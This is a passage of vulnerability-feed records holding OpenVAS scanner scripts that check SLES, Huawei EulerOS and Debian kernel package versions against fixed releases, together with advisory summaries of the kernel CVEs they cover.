exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:38:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-9715", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-9940", "CVE-2015-0274", "CVE-2014-9728", "CVE-2015-1421", "CVE-2015-1465", "CVE-2014-9730", "CVE-2014-9904", "CVE-2014-9900", "CVE-2014-9895", "CVE-2014-9914", "CVE-2014-9922", "CVE-2015-0239", "CVE-2014-9729", "CVE-2015-1333", "CVE-2015-0275", "CVE-2015-1573", "CVE-2014-9710", "CVE-2014-9731", "CVE-2014-9892"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191485", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191485", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1485)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1485\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2014-9644\", \"CVE-2014-9710\", \"CVE-2014-9715\", \"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2014-9892\", \"CVE-2014-9895\", \"CVE-2014-9900\", \"CVE-2014-9904\", \"CVE-2014-9914\", \"CVE-2014-9922\", \"CVE-2014-9940\", \"CVE-2015-0239\", \"CVE-2015-0274\", \"CVE-2015-0275\", \"CVE-2015-1333\", \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1465\", \"CVE-2015-1573\", \"CVE-2015-1593\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:53:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1485)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1485\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1485\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1485 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the way the Linux kernel's Crypto subsystem handled automatic loading of kernel modules. A local user could use this flaw to load any installed kernel module, and thus increase the attack surface of the running kernel.(CVE-2014-9644)\n\nThe Btrfs implementation in the Linux kernel before 3.19 does not ensure that the visible xattr state is consistent with a requested replacement, which allows local users to bypass intended ACL settings and gain privileges via standard filesystem operations (1) during an xattr-replacement time window, related to a race condition, or (2) after an xattr-replacement attempt that fails because the data does not fit.(CVE-2014-9710)\n\nAn integer overflow flaw was found in the way the Linux kernel's netfilter connection tracking implementation loaded extensions. An attacker on a local network could potentially send a sequence of specially crafted packets that would initiate the loading of a large number of extensions, causing the targeted system in that network to crash.(CVE-2014-9715)\n\nA symlink size validation was missing in Linux kernels built with UDF file system (CONFIG_UDF_FS) support, allowing the corruption of kernel memory. An attacker able to mount a corrupted/malicious UDF file system image could cause the kernel to crash.(CVE-2014-9728)\n\nA symlink size validation was missing in Linux kernels built with UDF file system (CONFIG_UDF_FS) support, allowing the corruption of kernel memory. An attacker able to mount a corrupted/malicious UDF file system image could cause the kernel to crash.(CVE-2014-9729)\n\nA symlink size validation was missing in Linux kernels built with UDF file system (CONFIG_UDF_FS) support, allowing the corruption of kernel memory. An attacker able to mount a corrupted/malicious UDF file system image could cause the kernel to crash.(CVE-2014-9730)\n\nA path length checking flaw was found in Linux kernels built with UDF file system (CONFIG_UDF_FS) support. An attacker able to mount a corrupted/malicious UDF file system image could use this flaw to leak kernel memory to user-space.(CVE-2014-9731)\n\nThe snd_compr_tstamp function in sound/core/compress_offload.c in the Linux kernel through 4.7, as used in Android before 2016-08-05 on Nexus 5 and 7 (2013) devices, does not properly initialize a timestamp data structure, which allows attackers to obtain sensitive information via a crafted application, aka Android internal bug 28770164 and Qualcomm internal bug CR568717.(CVE-2014-9892)\n\ndrivers/media/media-device.c in the Linux kernel before 3.11, as used in Android before 2016-08-05 on Nexus 5 and 7 (2013) devices, ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.", "modified": "2019-03-18T00:00:00", "published": "2015-02-23T00:00:00", "id": "OPENVAS:1361412562310703170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703170", "type": "openvas", "title": "Debian Security Advisory DSA 3170-1 (linux - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3170.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3170-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703170\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2013-7421\", \"CVE-2014-7822\", \"CVE-2014-8160\", \"CVE-2014-8559\",\n \"CVE-2014-9585\", \"CVE-2014-9644\", \"CVE-2014-9683\", \"CVE-2015-0239\",\n \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_name(\"Debian Security Advisory DSA 3170-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-23 00:00:00 +0100 (Mon, 23 Feb 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3170.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 3.2.65-1+deb7u2. Additionally this update\nfixes regressions introduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be fixed\nsoon (a subset is fixed already).\n\nFor the unstable distribution (sid), these problems will be fixed soon\n(a subset is fixed already).\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) 